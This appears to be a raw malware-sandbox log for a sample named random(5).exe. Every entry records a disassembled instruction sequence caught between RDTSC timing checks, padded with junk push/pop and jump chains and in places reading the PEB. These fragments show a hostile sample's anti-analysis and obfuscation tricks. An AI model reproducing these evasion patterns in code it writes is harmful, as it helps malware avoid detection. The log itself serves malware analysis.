Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0A0C second address: 17E0A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0B57 second address: 17E0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0B60 second address: 17E0B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0D04 second address: 17E0D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0D09 second address: 17E0D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C385h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E0FFC second address: 17E1000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E1000 second address: 17E1023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F519CD4C37Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E1023 second address: 17E102B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E102B second address: 17E1031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E4CA4 second address: 17E4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17E4CAC second address: 17E4CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1821DE6 second address: 1821DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F519CFC89B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1821DF5 second address: 1821DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1821DFC second address: 1821E06 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F519CFC89BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 18346A1 second address: 18346A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 18346A7 second address: 18346C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F519CFC89C8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1834811 second address: 1834816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902736 second address: 190273B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902872 second address: 1902887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902887 second address: 190288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902CFB second address: 1902D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F519CD4C37Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902D1D second address: 1902D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F519CFC89B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902D29 second address: 1902D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F519CD4C382h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F519CD4C37Eh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902D6F second address: 1902D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F519CFC89B6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902D7D second address: 1902D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902D82 second address: 1902DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902DA1 second address: 1902DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1902DA5 second address: 1902DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1903216 second address: 1903238 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F519CD4C380h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1903238 second address: 1903248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 19050BD second address: 19050D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 19050D1 second address: 19050D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 19050D7 second address: 19050DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1907C7A second address: 1907C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90008 second address: 6E9001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9001B second address: 6E90021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90021 second address: 6E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F519CD4C37Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F519CD4C37Bh 0x00000018 popfd 0x00000019 mov eax, 43692F2Fh 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 pushad 0x00000023 push ecx 0x00000024 jmp 00007F519CD4C387h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F519CD4C37Fh 0x00000032 and ax, 671Eh 0x00000037 jmp 00007F519CD4C389h 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90099 second address: 6E900FA instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d popad 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 jmp 00007F519CFC89BEh 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 jmp 00007F519CFC89BAh 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 jmp 00007F519CFC89BEh 0x0000002d call 00007F519CFC89C2h 0x00000032 mov ch, 41h 0x00000034 pop ebx 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a movsx edi, ax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E900FA second address: 6E901A0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F519CD4C382h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushfd 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 sbb ecx, 18A88B68h 0x00000017 jmp 00007F519CD4C37Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 movsx edi, cx 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 mov ebx, dword ptr [eax+10h] 0x0000002b jmp 00007F519CD4C389h 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F519CD4C37Ch 0x00000038 add eax, 430BE028h 0x0000003e jmp 00007F519CD4C37Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F519CD4C381h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F519CD4C37Dh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E901A0 second address: 6E901B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E901B0 second address: 6E9025B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [762C06ECh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C37Dh 0x00000015 jmp 00007F519CD4C37Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C388h 0x00000021 xor cl, 00000078h 0x00000024 jmp 00007F519CD4C37Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007F519CD4C386h 0x00000032 jne 00007F519CD4D1E2h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 180B7EF0h 0x00000040 pushfd 0x00000041 jmp 00007F519CD4C389h 0x00000046 and ecx, 1BF8EC76h 0x0000004c jmp 00007F519CD4C381h 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9025B second address: 6E902D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 and ax, D1AEh 0x0000000e jmp 00007F519CFC89C9h 0x00000013 popfd 0x00000014 mov cx, 4E37h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov ebx, ecx 0x0000001f pushad 0x00000020 mov ah, A8h 0x00000022 call 00007F519CFC89C7h 0x00000027 pop esi 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F519CFC89C5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E902D5 second address: 6E90350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C387h 0x00000009 sbb cx, A27Eh 0x0000000e jmp 00007F519CD4C389h 0x00000013 popfd 0x00000014 mov ch, DCh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C389h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 mov si, E79Fh 0x0000002b popad 0x0000002c call dword ptr [76290B60h] 0x00000032 mov eax, 75A0E5E0h 0x00000037 ret 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d mov ax, bx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90350 second address: 6E90356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90356 second address: 6E9035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9035A second address: 6E903B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e call 00007F519CFC89BFh 0x00000013 movzx esi, di 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, 6005C580h 0x00000021 pushfd 0x00000022 jmp 00007F519CFC89C9h 0x00000027 adc cx, 7386h 0x0000002c jmp 00007F519CFC89C1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E903B7 second address: 6E903BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E903BD second address: 6E903C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E903C1 second address: 6E9044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a jmp 00007F519CD4C382h 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C382h 0x00000015 or esi, 3F233888h 0x0000001b jmp 00007F519CD4C37Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], edi 0x00000025 pushad 0x00000026 mov di, ax 0x00000029 pushfd 0x0000002a jmp 00007F519CD4C380h 0x0000002f sub al, FFFFFFE8h 0x00000032 jmp 00007F519CD4C37Bh 0x00000037 popfd 0x00000038 popad 0x00000039 push dword ptr [eax] 0x0000003b jmp 00007F519CD4C386h 0x00000040 mov eax, dword ptr fs:[00000030h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9044F second address: 6E90455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E904B6 second address: 6E904C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E904C8 second address: 6E90559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F519CFC89C7h 0x0000000f test esi, esi 0x00000011 jmp 00007F519CFC89C6h 0x00000016 je 00007F520C377B5Dh 0x0000001c jmp 00007F519CFC89C0h 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 call 00007F519CFC89C7h 0x00000029 pushad 0x0000002a popad 0x0000002b pop ecx 0x0000002c mov bx, 432Ah 0x00000030 popad 0x00000031 mov dword ptr [esi], edi 0x00000033 jmp 00007F519CFC89C1h 0x00000038 mov dword ptr [esi+04h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov ebx, 7729787Eh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90559 second address: 6E9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9055E second address: 6E90581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov cx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+08h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F519CFC89C2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90581 second address: 6E90628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C381h 0x00000009 xor ch, 00000066h 0x0000000c jmp 00007F519CD4C381h 0x00000011 popfd 0x00000012 call 00007F519CD4C380h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007F519CD4C381h 0x00000023 mov eax, dword ptr [ebx+4Ch] 0x00000026 jmp 00007F519CD4C37Eh 0x0000002b mov dword ptr [esi+10h], eax 0x0000002e pushad 0x0000002f call 00007F519CD4C37Eh 0x00000034 mov esi, 5EA562F1h 0x00000039 pop eax 0x0000003a movsx edx, si 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+50h] 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushfd 0x00000045 jmp 00007F519CD4C382h 0x0000004a or ch, FFFFFFF8h 0x0000004d jmp 00007F519CD4C37Bh 0x00000052 popfd 0x00000053 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90628 second address: 6E9069A instructions: 0x00000000 rdtsc 0x00000002 mov ah, BAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 2Ch 0x00000008 popad 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F519CFC89BCh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 pushad 0x00000015 call 00007F519CFC89BEh 0x0000001a mov edi, ecx 0x0000001c pop eax 0x0000001d call 00007F519CFC89C7h 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+18h], eax 0x00000029 jmp 00007F519CFC89C5h 0x0000002e mov eax, dword ptr [ebx+58h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F519CFC89BDh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9069A second address: 6E906AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906AA second address: 6E906AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906AE second address: 6E906C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F519CD4C37Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906C5 second address: 6E906CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906CB second address: 6E906CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906CF second address: 6E906E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F519CFC89BBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E906E9 second address: 6E90706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90706 second address: 6E90775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 sub esi, 1144D8FEh 0x0000000f jmp 00007F519CFC89C9h 0x00000014 popfd 0x00000015 call 00007F519CFC89C0h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+20h], eax 0x00000021 jmp 00007F519CFC89C1h 0x00000026 mov eax, dword ptr [ebx+60h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 7B7AB3BEh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90775 second address: 6E9077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9077B second address: 6E9077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9077F second address: 6E90783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90783 second address: 6E90794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90794 second address: 6E90798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90798 second address: 6E9079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9079E second address: 6E907B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d mov si, 5ECDh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E907B7 second address: 6E907FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 9A85h 0x00000008 popad 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d jmp 00007F519CFC89C0h 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 popad 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a pushad 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+6Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F519CFC89C9h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E907FF second address: 6E90834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7FF2h 0x00000007 mov ebx, 5AD0A93Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [esi+30h], ax 0x00000013 jmp 00007F519CD4C385h 0x00000018 mov ax, word ptr [ebx+00000088h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90834 second address: 6E90838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E90838 second address: 6E9083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
